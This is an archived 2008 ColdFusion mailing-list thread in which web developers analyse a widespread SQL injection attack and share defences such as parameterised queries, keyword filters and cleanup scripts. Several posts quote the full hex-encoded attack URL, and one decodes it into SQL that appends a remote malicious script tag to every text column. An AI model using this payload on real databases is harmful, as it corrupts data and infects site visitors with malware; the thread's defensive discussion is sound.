House of Fusion
Search over 2,500 ColdFusion resources here
  
Home of the ColdFusion Community

Mailing Lists
Home /  Groups /  ColdFusion Talk (CF-Talk)

(ot) URL Hack Attempt Leaves Me Scractching My Head

  << Previous Post |  RSS |  Sort Oldest First |  Sort Latest First |  Subscribe to this Group Next >> 
>>We're getting hit hard today with this.
Gerald Guido
07/21/08 01:04 P
And what about my page exec(.cfm?! :OD
Adrian Lynch
07/24/08 09:11 A
Doooooooh!
Jesse Beckton
07/22/08 10:26 P
Read this:
Brad Wood
07/21/08 11:07 A
Good point. My bad...
Che Vilnonis
07/21/08 11:44 A
Mutha!!!
Andy Matthews
07/21/08 12:21 P
Brad,
Heikki Heikkinen
07/21/08 06:12 P
>>Drop database foo
Gerald Guido
07/21/08 12:16 P
I was just looking into that myself.
Joshua Cyr
07/21/08 01:11 P
>I was just looking into that myself.
Matthew Smith
07/24/08 03:05 P
+1
Che Vilnonis
07/21/08 01:14 P
Dave...
Andy Matthews
07/21/08 03:36 P
Band-Aids and duct tape...
Brad Wood
07/21/08 02:02 P
Just an FYI...
Andy Matthews
07/21/08 03:40 P
Mark,
Heikki Heikkinen
07/21/08 05:22 P
One of my websites got hit.. I always use
Al Musella, DPM
07/23/08 06:18 P
Hi Dave,
Martin Schmelzle
07/23/08 03:43 P
Brad/dave,
Mark Kruger
07/21/08 03:42 P
>>....and no...not retarded....just tactless
Claude Schneegans
07/21/08 09:13 P
>>I too was concerned about your solution being
Claude Schneegans
07/21/08 09:50 P
Easy. sp_executesql
Brad Wood
07/21/08 04:07 P
Adrian,
Dave Phillips
07/24/08 10:09 A
>>In our case, what
Claude Schneegans
07/24/08 10:55 A
Always sanitize your data entry.
Gerald Guido
07/21/08 10:28 P
But Billy has been told to turn:
Adrian Lynch
07/24/08 10:13 A
>>But Billy has been told to turn:
Claude Schneegans
07/24/08 10:46 A
I'll say it again.
James Holmes
07/24/08 11:59 A
What about if I put:
Radek Valachovic
07/23/08 08:33 P
Gabriel,
Mark Kruger
07/23/08 11:17 P
Mark,
Gabriel
07/24/08 12:19 A
Gabriel,
Mark Kruger
07/24/08 08:56 A
>>var listSQLInject =
Claude Schneegans
07/24/08 09:16 A
What would you suggest for this kind of thing:
Radek Valachovic
07/24/08 02:22 P
Correction sql should be in the text:
Radek Valachovic
07/24/08 03:04 P
Radek,
Cutter (CFRelated)
07/24/08 03:09 P
Charlie Griefer wrote:
Ian Skinner
07/24/08 02:31 P
My thinking is:
Al Musella, DPM
07/23/08 11:42 P
Al Musella, DPM wrote:
Jochem van Dieten
07/24/08 03:13 P
>>If you don't really care
Claude Schneegans
07/24/08 02:06 P
Dave Phillips wrote:
Ian Skinner
07/24/08 03:03 P
Interesting question:
Radek Valachovic
07/25/08 07:29 P
> > If you don't really care
Dave Watts
07/24/08 02:36 P
> Interesting question:
Dave Watts
07/26/08 12:49 A
Top  |   Reply  |   Original Post  |   RSS Feed  |   Subscribe to this Group
Author:
Che Vilnonis
07/21/2008 10:55 AM

Just was looking at a 'user monitor' page on one of my sites and I saw the url string below being called. I've seen several sql injection urls before, but what the heck are they trying to accomplish here? Eeverything is cfqueryparam'ed. Thanks, Che /rss.cfm?';DECLARE @S CHAR(4000);SET @S=CAST(0x4445434C415245204054207661726368617228323535292C404320766172636861 72283430303029204445434C415245205461626C655F437572736F7220435552534F5220464F 522073656C65637420612E6E616D652C622E6E616D652066726F6D207379736F626A65637473 20612C737973636F6C756D6E73206220776865726520612E69643D622E696420616E6420612E 78747970653D27752720616E642028622E78747970653D3939206F7220622E78747970653D33 35206F7220622E78747970653D323331206F7220622E78747970653D31363729204F50454E20 5461626C655F437572736F72204645544348204E4558542046524F4D20205461626C655F4375 72736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D30 2920424547494E20657865632827757064617465205B272B40542B275D20736574205B272B40 432B275D3D5B272B40432B275D2B2727223E3C2F7469746C653E3C736372697074207372633D 22687474703A2F2F312E766572796E782E636E2F772E6A73223E3C2F7363726970743E3C212D 2D272720776865726520272B40432B27206E6F74206C696B6520272725223E3C2F7469746C65 3E3C736372697074207372633D22687474703A2F2F312E766572796E782E636E2F772E6A7322 3E3C2F7363726970743E3C212D2D272727294645544348204E4558542046524F4D2020546162 6C655F437572736F7220494E544F2040542C404320454E4420434C4F5345205461626C655F43 7572736F72204445414C4C4F43415445205461626C655F437572736F72 AS CHAR(4000));EXEC(@S);

Top  |   Parent  |   Reply  |   Original Post  |   RSS Feed  |   Subscribe to this Group
Author:
Mark Kruger
07/21/2008 11:00 AM

This is a popular and very malicious SQL injection attack that is making the rounds: http://www.coldfusionmuse.com/index.cfm/2008/7/18/Injection-Using-CAST-And-A SCII -Mark Mark A. Kruger, CFG, MCSE (402) 408-3733 ext 105 www.cfwebtools.com www.coldfusionmuse.com www.necfug.com Just was looking at a 'user monitor' page on one of my sites and I saw the url string below being called. I've seen several sql injection urls before, but what the heck are they trying to accomplish here? Eeverything is cfqueryparam'ed. Thanks, Che /rss.cfm?';DECLARE @S CHAR(4000);SET @S=CAST(0x4445434C415245204054207661726368617228323535292C404320766172636861 72283430303029204445434C415245205461626C655F437572736F7220435552534F5220464F 522073656C65637420612E6E616D652C622E6E616D652066726F6D207379736F626A65637473 20612C737973636F6C756D6E73206220776865726520612E69643D622E696420616E6420612E 78747970653D27752720616E642028622E78747970653D3939206F7220622E78747970653D33 35206F7220622E78747970653D323331206F7220622E78747970653D31363729204F50454E20 5461626C655F437572736F72204645544348204E4558542046524F4D20205461626C655F4375 72736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D30 2920424547494E20657865632827757064617465205B272B40542B275D20736574205B272B40 432B275D3D5B272B40432B275D2B2727223E3C2F7469746C653E3C736372697074207372633D 22687474703A2F2F312E766572796E782E636E2F772E6A73223E3C2F7363726970743E3C212D 2D272720776865726520272B40432B27206E6F74206C696B6520272725223E3C2F7469746C65 3E3C736372697074207372633D22687474703A2F2F312E766572796E782E636E2F772E6A7322 3E3C2F7363726970743E3C212D2D272727294645544348204E4558542046524F4D2020546162 6C655F437572736F7220494E544F2040542C404320454E4420434C4F5345205461626C655F43 7572736F72204445414C4C4F43415445205461626C655F437572736F72 AS CHAR(4000));EXEC(@S);

Top  |   Parent  |   Reply  |   Original Post  |   RSS Feed  |   Subscribe to this Group
Author:
Gerald Guido
07/21/2008 11:01 AM

This is some sort of encoding... Like Bin Hex, Spammers use it to obscure urls and such. Computers read it just fine. If you look around on the internets you can find a decoder to render it to human readable form. You just need to figure out what sort of encoding they are using ----- Excess quoted text cut - see Original Post for more -----

Top  |   Parent  |   Reply  |   Original Post  |   RSS Feed  |   Subscribe to this Group
Author:
Josh Nathanson
07/21/2008 12:36 PM

I am seeing these too on our site, in errors generated by bad data going into a cfqueryparam. If several people on this list are seeing this attack, it must be pretty widespread. -- Josh ----- Excess quoted text cut - see Original Post for more -----

Top  |   Parent  |   Reply  |   Original Post  |   RSS Feed  |   Subscribe to this Group
Author:
Kris Jones
07/21/2008 12:55 PM

We're getting hit hard today with this. They're failing, because we use cfqueryparam and cfprocparam. But it is quite annoying. -KJ

Top  |   Parent  |   Reply  |   Original Post  |   RSS Feed  |   Subscribe to this Group
Author:
Gerald Guido
07/21/2008 01:04 PM

>>We're getting hit hard today with this. >>/rss.cfm? Is is just rss.cfm? I haven't looked at our logs yet. Where did you see this. The server log files? ~~G~~ > We're getting hit hard today with this. They're failing, because we > use cfqueryparam and cfprocparam. But it is quite annoying. > > -KJ

Top  |   Parent  |   Reply  |   Original Post  |   RSS Feed  |   Subscribe to this Group
Author:
Kris Jones
07/21/2008 02:00 PM

It'll show in your logs of course. We also have error reports that dump the error info and certain collections and mail it to the dev team. -KJ ----- Excess quoted text cut - see Original Post for more -----

Top  |   Parent  |   Reply  |   Original Post  |   RSS Feed  |   Subscribe to this Group
Author:
Andy Matthews
07/21/2008 03:41 PM

We're getting hit with this attack via a wide range of hosted domains, and various files. Sitemap.cfm is a common one at this point. andy >>We're getting hit hard today with this. >>/rss.cfm? Is is just rss.cfm? I haven't looked at our logs yet. Where did you see this. The server log files? ~~G~~ > We're getting hit hard today with this. They're failing, because we > use cfqueryparam and cfprocparam. But it is quite annoying. > > -KJ > >

Top  |   Parent  |   Reply  |   Original Post  |   RSS Feed  |   Subscribe to this Group
Author:
Claude Schneegans
07/21/2008 03:11 PM

>>If several people on this list are seeing this attack, it must be pretty widespread. Until now, I just check for strings "http" or "user" in url.id containing something else than an integer value. I now just added "DECLARE" in the validation. All my templates expecting id=<some numeric> start with this code (included): <CFIF val(id) EQ 0 AND (id CONTAINS "http" OR id CONTAINS "user" OR id CONTAINS "DECLARE")> ... save IP of this guy in the banned addresses table... </CFIF> This is even more efficient than CFQURYPARAM, because this way I'm sure the guy will not have another chance. -- _______________________________________ REUSE CODE! Use custom tags; See http://www.contentbox.com/claude/customtags/tagstore.cfm (Please send any spam to this address: piegeacon@internetique.com) Thanks.

Top  |   Parent  |   Reply  |   Original Post  |   RSS Feed  |   Subscribe to this Group
Top  |   Parent  |   Reply  |   Original Post  |   RSS Feed  |   Subscribe to this Group
Author:
james carberry
07/21/2008 01:58 PM

Even easier than monkeying with every single one of your cfquery's.... just add following line to the TOP of all your application.cfm's: <cfif cgi.SCRIPT_NAME contains "EXEC(" OR cgi.PATH_INFO contains "EXEC(" OR cgi.QUERY_STRING contains "EXEC("><cfabort></cfif> This will immediately shut down execution of any CFM that this piece of trash tries to invoke to execute this particular type of SQL for. peace, j ----- Excess quoted text cut - see Original Post for more -----

Top  |   Parent  |   Reply  |   Original Post  |   RSS Feed  |   Subscribe to this Group
Author:
Adrian Lynch
07/24/2008 09:11 AM

And what about my page exec(.cfm?! :OD Just checking my logs now and I'm getting hit by this too. cfqp'd all the way though... Even easier than monkeying with every single one of your cfquery's.... just add following line to the TOP of all your application.cfm's: <cfif cgi.SCRIPT_NAME contains "EXEC(" OR cgi.PATH_INFO contains "EXEC(" OR cgi.QUERY_STRING contains "EXEC("><cfabort></cfif> This will immediately shut down execution of any CFM that this piece of trash tries to invoke to execute this particular type of SQL for. peace, j

Top  |   Parent  |   Reply  |   Original Post  |   RSS Feed  |   Subscribe to this Group
Author:
james carberry
07/21/2008 02:43 PM

Just put the following line at the TOP of your application.cfm to innoculate your CF webs against this attack: <cfif cgi.SCRIPT_NAME contains "EXEC(" OR cgi.PATH_INFO contains "EXEC(" OR cgi.QUERY_STRING contains "EXEC("><cfabort></cfif> peace, j ----- Excess quoted text cut - see Original Post for more -----

Top  |   Parent  |   Reply  |   Original Post  |   RSS Feed  |   Subscribe to this Group
Author:
Gerald Guido
07/21/2008 07:52 PM

I went to look at a site I do side work for and they got hit. No... not my stuff. :) We are going to be reading about this on all the tech rags like Info World and Zdnet tomorrow. ZDnet will prolly post it with a H1 tag with a blink tag for good measure. One of the things about SQL server I never liked was how you could run ore than one sql script at a time. Mysql doesn't allow you to do this LTIL. cfqueryparam... me love you long time. ~G~ "If everything seems under control, you're not going fast enough" -- Mario Andretti

Top  |   Parent  |   Reply  |   Original Post  |   RSS Feed  |   Subscribe to this Group
Author:
Andreas Ertle
07/22/2008 04:50 AM

>Just was looking at a 'user monitor' page on one of my sites and I saw the >url string below being called. I've seen several sql injection urls before, >but what the heck are they trying to accomplish here? Eeverything is >cfqueryparam'ed. Thanks, Che > >/rss.cfm?';DECLARE @S CHAR(4000);SET >@S=CAST(0x4445434C415245204054207661726368617228323535292C404320766172636861 Hello, naive question maybe, nevertheless: Can someone confirm that having applied the Microsoft patch(es) mentioned on http://www.microsoft.com/technet/security/bulletin/MS08-040.mspx is sufficient to protect against attacks like these? Who had applied the patch(es) but still was attacked and infected successfully?

Top  |   Parent  |   Reply  |   Original Post  |   RSS Feed  |   Subscribe to this Group
Author:
Kris Jones
07/22/2008 08:13 AM

This attack has nothing to do with elevation of privilege. It simply tacks on a SQL procedure to a query existing on the page already. This procedure then runs through the tables/columns in the database appending text the end of content in varchar fields. The text appended varies, but what I've seen is a javascript file call, that would run when the affected content was displayed in a browser. I can't see how that security patch would have anything to do with it. (Please enlighten me if I'm wrong.) > Can someone confirm that having applied the Microsoft patch(es) mentioned on > http://www.microsoft.com/technet/security/bulletin/MS08-040.mspx > is sufficient to protect against attacks like these?

Top  |   Parent  |   Reply  |   Original Post  |   RSS Feed  |   Subscribe to this Group
Author:
Jerry Johnson
07/22/2008 08:40 AM

The purpose of the hack is to change your website, so that each visitor is hit with a series of browser exploit attempts while reading your website. Some of the exploits attempted are handled by the MS patch. Some are not. (Examples of the exploits: Ms06-014, flash, SP2, Realplayer11, Norton, pxhack) ----- Excess quoted text cut - see Original Post for more -----

Top  |   Parent  |   Reply  |   Original Post  |   RSS Feed  |   Subscribe to this Group
Author:
Jesse Beckton
07/22/2008 10:26 PM

Doooooooh! I just got through cleaning the results of this attack out of a clients database! They have a very old CF application that was poorly written and has no cfqueryparams! I must have cleaned 10 tables so far... Funny part is, I warned my client several months ago after seeing evidence of a sql injection in his DB that he needed to at the very least purchase an application firewall to protect his sites. After running a trial of a popular application firewall he decided not to spend the money or try to deal with the ongoing tweaking required so that his site visitors are not effected by the firewall. Needless to say his security holes just cost him alot more money and down time due to this latest attach.

Top  |   Parent  |   Reply  |   Original Post  |   RSS Feed  |   Subscribe to this Group
Author:
Pete Ruckelshaus
07/25/2008 09:47 PM

I just got hit by this on one of my older sites (inconsistent use of cfqueryparam) yesterday.  I found an immensely helpful and very timely posting here http://russ.michaels.me.uk/index.cfm/2008/7/24/SQL-Injection-Attacks--How-to-protect_yourself (I believe "Snake" is a list participant).  I spent 7 hours editing all of my queries to make sure I was using cfqueryparam consistently throughout, then ran Snake's AMAZINGLY EFFECTIVE sql solution to clean up the database...otherwise it would have been down to editing thousands of database records.  Additionally, I switched all form transactions over to POSTS and made sure everything was properly scoped. In addition, I added a couple of scripts to my application.onRequestStart(); one of them ensures that the refering page on a POST transaction is from my site:   <cfif CGI.http_referer DOES NOT CONTAIN CGI.server_name>    <cfsavecontent variable="msg"><p>You have attempted to perform an illegal operation.</p></cfsavecontent>    <cfabort showerror="#msg#">   </cfif> The other script checks the URL and FORM scopes to ensure that it doesn't contain anything nasty...basically the last code example from Snake's blog posting, with some stuff added. Pete

Top  |   Reply  |   Original Post  |   RSS Feed  |   Subscribe to this Group
Author:
Brad Wood
07/21/2008 11:07 AM

Read this: http://www.coldfusionmuse.com/index.cfm/2008/7/18/Injection-Using-CAST-A nd-ASCII ~Brad Just was looking at a 'user monitor' page on one of my sites and I saw the url string below being called. I've seen several sql injection urls before, but what the heck are they trying to accomplish here? Eeverything is cfqueryparam'ed. Thanks, Che

Top  |   Reply  |   Original Post  |   RSS Feed  |   Subscribe to this Group
Author:
Brad Wood
07/21/2008 11:10 AM

Why bother looking around the internet?  Use your SQL server to decode it! Simply change the exec to a print statement.  Very important! :) ~Brad This is some sort of encoding... Like Bin Hex, Spammers use it to obscure urls and such. Computers read it just fine. If you look around on the internets you can find a decoder to render it to human readable form. You just need to figure out what sort of encoding they are using

Top  |   Parent  |   Reply  |   Original Post  |   RSS Feed  |   Subscribe to this Group
Author:
Gerald Guido
07/21/2008 11:14 AM

>>Why bother looking around the internet?  Use your SQL server to decode it! Huh... Learn sumptin new every day. That is why I keep coming back here. ;) Thanx Brad. ~G~ ----- Excess quoted text cut - see Original Post for more -----

Top  |   Parent  |   Reply  |   Original Post  |   RSS Feed  |   Subscribe to this Group
Author:
Che Vilnonis
07/21/2008 11:33 AM

Tried printing the code in SQL Analyzer and got nothing. Can anyone translate it to text? Not sure what I am missing. /rss.cfm?';DECLARE @S CHAR(4000);SET @S=CAST(0x4445434C415245204054207661726368617228323535292C404320766172636861 72283430303029204445434C415245205461626C655F437572736F7220435552534F5220464F 522073656C65637420612E6E616D652C622E6E616D652066726F6D207379736F626A65637473 20612C737973636F6C756D6E73206220776865726520612E69643D622E696420616E6420612E 78747970653D27752720616E642028622E78747970653D3939206F7220622E78747970653D33 35206F7220622E78747970653D323331206F7220622E78747970653D31363729204F50454E20 5461626C655F437572736F72204645544348204E4558542046524F4D20205461626C655F4375 72736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D30 2920424547494E20657865632827757064617465205B272B40542B275D20736574205B272B40 432B275D3D5B272B40432B275D2B2727223E3C2F7469746C653E3C736372697074207372633D 22687474703A2F2F312E766572796E782E636E2F772E6A73223E3C2F7363726970743E3C212D 2D272720776865726520272B40432B27206E6F74206C696B6520272725223E3C2F7469746C65 3E3C736372697074207372633D22687474703A2F2F312E766572796E782E636E2F772E6A7322 3E3C2F7363726970743E3C212D2D272727294645544348204E4558542046524F4D2020546162 6C655F437572736F7220494E544F2040542C404320454E4420434C4F5345205461626C655F43 7572736F72204445414C4C4F43415445205461626C655F437572736F72 AS CHAR(4000));EXEC(@S); >>Why bother looking around the internet?  Use your SQL server to decode it! Huh... Learn sumptin new every day. That is why I keep coming back here. ;) Thanx Brad. ~G~

Top  |   Parent  |   Reply  |   Original Post  |   RSS Feed  |   Subscribe to this Group
Author:
Dave Francis
07/21/2008 11:42 AM

Can we please stop distributing this script ;) Tried printing the code in SQL Analyzer and got nothing. Can anyone translate it to text? Not sure what I am missing. /rss.cfm?';DECLARE @S CHAR(4000);SET @S=CAST(0x4445434C415245204054207661726368617228323535292C40432076617263 6861

Top  |   Parent  |   Reply  |   Original Post  |   RSS Feed  |   Subscribe to this Group
Author:
Che Vilnonis
07/21/2008 11:44 AM

Good point. My bad... Can we please stop distributing this script ;) Tried printing the code in SQL Analyzer and got nothing. Can anyone translate it to text? Not sure what I am missing. /rss.cfm?';DECLARE @S CHAR(4000);SET @S=CAST(0x4445434C415245204054207661726368617228323535292C40432076617263 6861

Top  |   Reply  |   Original Post  |   RSS Feed  |   Subscribe to this Group
Author:
Brad Wood
07/21/2008 11:45 AM

Works great for me.  You have to remove the extra line breaks though. Here is what it does:   DECLARE @T varchar(255),@C varchar(4000) DECLARE Table_Cursor CURSOR FOR select a.name, b.name from sysobjects a,syscolumns b where a.id=b.id and a.xtype='u' and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167) OPEN Table_Cursor FETCH NEXT FROM  Table_Cursor INTO @T,@C WHILE(@@FETCH_STATUS=0) BEGIN exec('update ['+@T+'] set ['+@C+']=['+@C+']+''"></title><script src="http://1.verynx.cn/w.js"></script><;!--'' where '+@C+' not like ''%"></title><script src="http://1.verynx.cn/w.js"></script><;!--''') FETCH NEXT FROM  Table_Cursor INTO @T,@C END CLOSE Table_Cursor DEALLOCATE Table_Cursor Did you read the blog I posted?  It explains it all. Tried printing the code in SQL Analyzer and got nothing. Can anyone translate it to text? Not sure what I am missing. /rss.cfm?';DECLARE @S CHAR(4000);SET @S=CAST(0x4445434C415245204054207661726368617228323535292C40432076617263 6861 72283430303029204445434C415245205461626C655F437572736F7220435552534F5220 464F 522073656C65637420612E6E616D652C622E6E616D652066726F6D207379736F626A6563 7473 20612C737973636F6C756D6E73206220776865726520612E69643D622E696420616E6420 612E 78747970653D27752720616E642028622E78747970653D3939206F7220622E7874797065 3D33 35206F7220622E78747970653D323331206F7220622E78747970653D31363729204F5045 4E20 5461626C655F437572736F72204645544348204E4558542046524F4D20205461626C655F 4375 72736F7220494E544F2040542C4043205748494C4528404046455443485F535441545553 3D30 2920424547494E20657865632827757064617465205B272B40542B275D20736574205B27 2B40 432B275D3D5B272B40432B275D2B2727223E3C2F7469746C653E3C736372697074207372 633D 22687474703A2F2F312E766572796E782E636E2F772E6A73223E3C2F7363726970743E3C 212D 2D272720776865726520272B40432B27206E6F74206C696B6520272725223E3C2F746974 6C65 3E3C736372697074207372633D22687474703A2F2F312E766572796E782E636E2F772E6A 7322 3E3C2F7363726970743E3C212D2D272727294645544348204E4558542046524F4D202054 6162 6C655F437572736F7220494E544F2040542C404320454E4420434C4F5345205461626C65 5F43 7572736F72204445414C4C4F43415445205461626C655F437572736F72 AS CHAR(4000));EXEC(@S); >>Why bother looking around the internet?  Use your SQL server to decode it! Huh... Learn sumptin new every day. That is why I keep coming back here. ;) Thanx Brad. ~G~

Top  |   Parent  |   Reply  |   Original Post  |   RSS Feed  |   Subscribe to this Group
Author:
Che Vilnonis
07/21/2008 11:58 AM

Yep, read the post. Must have been the line breaks that messed things up. Works great for me.  You have to remove the extra line breaks though. Here is what it does:

Top  |   Parent  |   Reply  |   Original Post  |   RSS Feed  |   Subscribe to this Group
Author:
Andy Matthews
07/21/2008 12:21 PM

Mutha!!! Our company JUST had this happen. We're working through it right now. Thanks for the confirmation guys. Appreciated. Works great for me.  You have to remove the extra line breaks though. Here is what it does:   Did you read the blog I posted?  It explains it all. Tried printing the code in SQL Analyzer and got nothing. Can anyone translate it to text? Not sure what I am missing. /rss.cfm?';DECLARE @S CHAR(4000);SET @S=CAST(0x4445434C415245204054207661726368617228323535292C40432076617263 6861 72283430303029204445434C415245205461626C655F437572736F7220435552534F5220 464F 522073656C65637420612E6E616D652C622E6E616D652066726F6D207379736F626A6563 7473 20612C737973636F6C756D6E73206220776865726520612E69643D622E696420616E6420 612E 78747970653D27752720616E642028622E78747970653D3939206F7220622E7874797065 3D33 35206F7220622E78747970653D323331206F7220622E78747970653D31363729204F5045 4E20 5461626C655F437572736F72204645544348204E4558542046524F4D20205461626C655F 4375 72736F7220494E544F2040542C4043205748494C4528404046455443485F535441545553 3D30 2920424547494E20657865632827757064617465205B272B40542B275D20736574205B27 2B40 432B275D3D5B272B40432B275D2B2727223E3C2F7469746C653E3C736372697074207372 633D 22687474703A2F2F312E766572796E782E636E2F772E6A73223E3C2F7363726970743E3C 212D 2D272720776865726520272B40432B27206E6F74206C696B6520272725223E3C2F746974 6C65 3E3C736372697074207372633D22687474703A2F2F312E766572796E782E636E2F772E6A 7322 3E3C2F7363726970743E3C212D2D272727294645544348204E4558542046524F4D202054 6162 6C655F437572736F7220494E544F2040542C404320454E4420434C4F5345205461626C65 5F43 7572736F72204445414C4C4F43415445205461626C655F437572736F72 AS CHAR(4000));EXEC(@S); >>Why bother looking around the internet?  Use your SQL server to decode it! Huh... Learn sumptin new every day. That is why I keep coming back here. ;) Thanx Brad. ~G~

Top  |   Parent  |   Reply  |   Original Post  |   RSS Feed  |   Subscribe to this Group
Author:
Wayne Janeck
07/21/2008 02:47 PM

We had the same hack on our site, did you guys figure out exactly what happened or how and where the sql was ran? or what the hackers purpose was?

Top  |   Parent  |   Reply  |   Original Post  |   RSS Feed  |   Subscribe to this Group
Author:
Heikki Heikkinen
07/21/2008 06:12 PM

Brad, This took care of part of the issue... but not all. I get this error: Msg 8152, Level 16, State 13, Line 1 String or binary data would be truncated. The statement has been terminated. Does anyone know what I need to do to get around the error above? thanks! ----- Excess quoted text cut - see Original Post for more -----

Top  |   Reply  |   Original Post  |   RSS Feed  |   Subscribe to this Group
Author:
Brad Wood
07/21/2008 11:50 AM

I appreciate your concern, but I'm pretty certain the bad people out there wanting to use this already know how to do it if they haven't already. One doesn't have to be too creative to come up with unique ways of screwing with databases.   Drop database foo Crap, I just let another one slip.  Brace yourself for another wave of attacks...  :) ~Brad Good point. My bad... Can we please stop distributing this script ;)

Top  |   Parent  |   Reply  |   Original Post  |   RSS Feed  |   Subscribe to this Group
Author:
Gerald Guido
07/21/2008 12:16 PM

>>Drop database foo >> Crap, I just let another one slip.  Brace yourself for another wave of attacks...  :) Lets not forget what a mess Little Bobby Tables made. http://xkcd.com/327/ -- "If everything seems under control, you're not going fast enough" -- Mario Andretti

Top  |   Reply  |   Original Post  |   RSS Feed  |   Subscribe to this Group
Author:
Brad Wood
07/21/2008 01:10 PM

Good on ya, mate.  If there were an award for using cfqueryparam I would give it to you. Since this seems to be such a hot topic right now, has anyone heard of a CFML code scanner to check for vulnerable cfqueries kind of like the var scoper does? Maybe we should write one to promote security in the CF community. ~Brad We're getting hit hard today with this. They're failing, because we use cfqueryparam and cfprocparam. But it is quite annoying. -KJ

Top  |   Parent  |   Reply  |   Original Post  |   RSS Feed  |   Subscribe to this Group
Top  |   Parent  |   Reply  |   Original Post  |   RSS Feed  |   Subscribe to this Group
Author:
Matthew Smith
07/24/2008 03:05 PM

>I was just looking into that myself. > >http://qpscanner.riaforge.org/ > > > I plan on running this against the code of my sites just to be sure. If I do find any vunerabilities, is there something I can run against the database to see if it has been infected? Thanks.

Top  |   Parent  |   Reply  |   Original Post  |   RSS Feed  |   Subscribe to this Group
Author:
Che Vilnonis
07/21/2008 01:14 PM

+1 Good idea! Good on ya, mate.  If there were an award for using cfqueryparam I would give it to you. Since this seems to be such a hot topic right now, has anyone heard of a CFML code scanner to check for vulnerable cfqueries kind of like the var scoper does? Maybe we should write one to promote security in the CF community. ~Brad We're getting hit hard today with this. They're failing, because we use cfqueryparam and cfprocparam. But it is quite annoying. -KJ

Top  |   Reply  |   Original Post  |   RSS Feed  |   Subscribe to this Group
Author:
Brad Wood
07/21/2008 01:15 PM

Sweet nectar... I'm trying this out and blogging it tonight.  If it's pretty easy to run I think we should promote an international check your freakin' cfqueries day!  Who want to buy the party hats and streamers? ~Brad I was just looking into that myself. http://qpscanner.riaforge.org/

Top  |   Reply  |   Original Post  |   RSS Feed  |   Subscribe to this Group
Author:
Dave Watts
07/21/2008 02:02 PM

> Even easier than monkeying with every single one of your ----- Excess quoted text cut - see Original Post for more ----- That would stop this specific problem, but would be easily circumvented by using one of the other mechanisms for executing strings on SQL Server. Dave Watts, CTO, Fig Leaf Software http://www.figleaf.com/ Fig Leaf Software provides the highest caliber vendor-authorized instruction at our training centers in Washington DC, Atlanta, Chicago, Baltimore, Northern Virginia, or on-site at your location. Visit http://training.figleaf.com/ for more information!

Top  |   Parent  |   Reply  |   Original Post  |   RSS Feed  |   Subscribe to this Group
Author:
Andy Matthews
07/21/2008 03:36 PM

Dave... What other ways are there? I know of two: EXEC and EXECUTE. ----- Excess quoted text cut - see Original Post for more ----- That would stop this specific problem, but would be easily circumvented by using one of the other mechanisms for executing strings on SQL Server. Dave Watts, CTO, Fig Leaf Software http://www.figleaf.com/ Fig Leaf Software provides the highest caliber vendor-authorized instruction at our training centers in Washington DC, Atlanta, Chicago, Baltimore, Northern Virginia, or on-site at your location. Visit http://training.figleaf.com/ for more information!

Top  |   Parent  |   Reply  |   Original Post  |   RSS Feed  |   Subscribe to this Group
Author:
Claude Schneegans
07/21/2008 03:44 PM

>>What other ways are there? I know of two: EXEC and EXECUTE "http" (http injection) and "user" (SQL injection) are classics. -- _______________________________________ REUSE CODE! Use custom tags; See http://www.contentbox.com/claude/customtags/tagstore.cfm (Please send any spam to this address: piegeacon@internetique.com) Thanks.

Top  |   Parent  |   Reply  |   Original Post  |   RSS Feed  |   Subscribe to this Group
Author:
Andy Matthews
07/21/2008 03:50 PM

I'm just talking about executing SQL, not SQL injection methods. >>What other ways are there? I know of two: EXEC and EXECUTE "http" (http injection) and "user" (SQL injection) are classics. -- _______________________________________ REUSE CODE! Use custom tags; See http://www.contentbox.com/claude/customtags/tagstore.cfm (Please send any spam to this address: piegeacon@internetique.com) Thanks.

Top  |   Reply  |   Original Post  |   RSS Feed  |   Subscribe to this Group
Author:
Brad Wood
07/21/2008 02:02 PM

Band-Aids and duct tape... Filtering for known attacks:  moderately useful as a stop gap if you are in the middle of an attack. Holistic approach to seal the original vulnerability against ALL current and future attacks (cfqueryparam): highly desirable. ~Brad Even easier than monkeying with every single one of your cfquery's.... just add following line to the TOP of all your application.cfm's: <cfif cgi.SCRIPT_NAME contains "EXEC(" OR cgi.PATH_INFO contains "EXEC(" OR cgi.QUERY_STRING contains "EXEC("><cfabort></cfif> This will immediately shut down execution of any CFM that this piece of trash tries to invoke to execute this particular type of SQL for. peace, j

Top  |   Reply  |   Original Post  |   RSS Feed  |   Subscribe to this Group
Author:
Brad Wood
07/21/2008 02:53 PM

The hacker's hope is that you will be outputting one of those varchar fields into a webpage without escaping HTML characters.  The extra text being inserted into the database fields will include a malicious JavaScript file from another server into the webpage.  I haven't looked at the JS to see what it does, but it probably tries to load some Trojan via an active X applet or something. To clean your database, I would recommend reverse-engineering the attack to loop over your database columns and remove the text they placed in there.  In the mean time, shut your site down so you don't infect your customers. ~Brad We had the same hack on our site, did you guys figure out exactly what happened or how and where the sql was ran? or what the hackers purpose was?

Top  |   Parent  |   Reply  |   Original Post  |   RSS Feed  |   Subscribe to this Group
Author:
Andy Matthews
07/21/2008 03:40 PM

Just an FYI... Our DBA (Ryan Cooper) took this same route and this is what he came up with. Thought I'd share this with the group on his behalf. He notes that you need to run this on each of your databases: -- start CREATE TABLE [dbo].[Infected](   [TableName] [varchar](255) NULL,   [ColumnName] [varchar](4000) NULL ); DECLARE @T nvarchar(255) DECLARE @C nvarchar(4000) DECLARE @SQL nvarchar(4000) DECLARE Table_Cursor CURSOR FOR select a.name, b.name from sysobjects a,syscolumns b where a.id=b.id and a.xtype='u' and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167)   open Table_Cursor fetch next from Table_Cursor into @T,@C while @@fetch_status = 0   begin     set @SQL = 'DECLARE @V varchar(4000); SET @V = NULL; SELECT TOP 1 @V = ' + @C + ' FROM ' + @T + ' WHERE '+@C+' LIKE ''%</title><script src="http://1.verynx.cn/w.js">;%''; IF (@V IS NOT NULL) BEGIN INSERT INTO dbo.Infected (tableName, ColumnName) VALUES ('''+@T+''','''+@C+''') END'     PRINT @SQL     EXECUTE sp_executesql @SQL     fetch next from Table_Cursor into @T,@C   END CLOSE Table_Cursor DEALLOCATE Table_Cursor -- end The hacker's hope is that you will be outputting one of those varchar fields into a webpage without escaping HTML characters.  The extra text being inserted into the database fields will include a malicious JavaScript file from another server into the webpage.  I haven't looked at the JS to see what it does, but it probably tries to load some Trojan via an active X applet or something. To clean your database, I would recommend reverse-engineering the attack to loop over your database columns and 